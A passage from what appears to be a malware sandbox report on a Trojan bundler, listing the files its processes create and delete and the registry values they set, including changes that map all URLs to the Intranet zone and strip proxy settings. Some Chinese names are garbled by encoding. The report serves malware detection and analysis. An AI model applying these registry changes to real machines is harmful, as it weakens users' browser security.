%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (12014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (2035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (4577 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (59 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (1235 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1393485.exe.log (123551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (1516 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (871 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (3245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\RAV.ini (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (101 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (6282 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (452 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (4492 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (2829 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (966 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (119 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (112 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mond (207 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (2067 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (2199 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RSD\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (2332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RAV_DL (0 bytes)
%Program Files%\Rising\RAV (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (0 bytes)
%Program Files%\Rising (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\irg[1].ashx (0 bytes)
%Program Files%\RsTest.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\ErrorNet[1].htm (0 bytes)

The process 9158.exe:3012 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

The process xianfengupdate.exe:660 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ã§Â½â€˜Ã¥Ââ‚¬Ã¥Â¯Â¼Ã¨Ë†Âª.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2058 bytes)
%Program Files%\tools\tools.exe (2532 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã¥Â¿Â«Ã¦ÂÂ·Ã¥Â¯Â¼Ã¨Ë†Âª\Ã¦â€°â€œÃ¦Å ËœÃ§Â½â€˜Ã¨Â´Â.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (8089 bytes)
%Documents and Settings%\%current user%\Favorites\Ã¥â€¦Â¨Ã¥â€ºÂ½Ã¦Å“â‚¬Ã§Â»â„¢Ã¥Å â€ºÃ¥â€¦â€¦Ã¥â‚¬Â¼Ã¥Âºâ€”-Ã¦Â·ËœÃ¥Â®ÂÃ§Â½â€˜.url (46 bytes)
%Documents and Settings%\All Users\Desktop\Ã§Â½â€˜Ã¥Ââ‚¬Ã¥Â¯Â¼Ã¨Ë†Âª.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll (544 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Ã¥â€¦Â¨Ã¥â€ºÂ½Ã¦Å“â‚¬Ã§Â»â„¢Ã¥Å â€ºÃ¥â€¦â€¦Ã¥â‚¬Â¼Ã¥Âºâ€”-Ã¦Â·ËœÃ¥Â®ÂÃ§Â½â€˜.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ã¦â€°â€œÃ¦Å ËœÃ§Â½â€˜Ã¨Â´Â.lnk (1 bytes)
%Documents and Settings%\All Users\Desktop\Ã¦â€°â€œÃ¦Å ËœÃ§Â½â€˜Ã¨Â´Â.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3165 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã¥Â¿Â«Ã¦ÂÂ·Ã¥Â¯Â¼Ã¨Ë†Âª\Ã§Â½â€˜Ã¥Ââ‚¬Ã¥Â¯Â¼Ã¨Ë†Âª.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (823 bytes)
%Documents and Settings%\%current user%\Desktop\Intrenet. Expleror.lnk (805 bytes)

The Trojan deletes the following file(s):

%Program Files%\tools\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (0 bytes)

The process %original file name%.exe:1736 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\xfplay\tools.exe (1530 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Program Files%\xfplay\bdupdate.exe (103612 bytes)
%Program Files%\xfplay\xianfengkunbang.exe (26550 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2566 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
%Program Files%\xfplay\xianfeng.exe (197071 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3345 bytes)
%Program Files%\xfplay\xianfengupdate.exe (16294 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (0 bytes)
%Program Files%\xfplay\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)

Registry activity

The process 9158chat2_ktv088_63.exe:2116 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\9158Service]
"IsGuest" = "1"

[HKLM\SOFTWARE\9158web]
"StartTime" = "11070701"

[HKLM\SOFTWARE\9158Service]
"TopLevel" = "1"
"Open" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\9158web]
"MainRun" = "d:\Program Files\9158KTV\9158.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\9158Service]
"LastPlat" = "51"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ]
"DisplayVersion" = "6.940"
"DisplayName" = "9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\9158Service]
"PlatName" = "9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\MozillaPlugins\@9158.com/nplogin]
"Path" = "d:\Program Files\9158KTV\nplogin.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F B0 73 C9 4C FA 32 79 A2 41 44 B1 71 CD D1 E0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ]
"UninstallString" = "d:\Program Files\9158KTV\Uninst.exe"
"Publisher" = "ÃƒÅ’ÃƒÂ¬Ã‚Â¸ÃƒÂ±Ã‚Â¿Ãƒâ€ Ã‚Â¼Ã‚Â¼Ã‚Â£Ã‚Â¨Ã‚ÂºÃ‚Â¼Ãƒâ€“ÃƒÂÃ‚Â£Ã‚Â©Ãƒâ€œÃƒÂÃƒÂÃƒÅ¾Ã‚Â¹Ã‚Â«Ãƒâ€¹Ã‚Â¾"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ]
"URLInfoAbout" = "http://www.9158.com/"

The process sr.exe:244 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 9158IE.exe:3116 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process xianfengkunbang.exe:1324 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 40 C0 11 D4 F1 F7 8B 5A 07 29 45 1C B6 47 3C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Browser]
"ieversion" = "6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process MM-liao8863.exe:2808 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

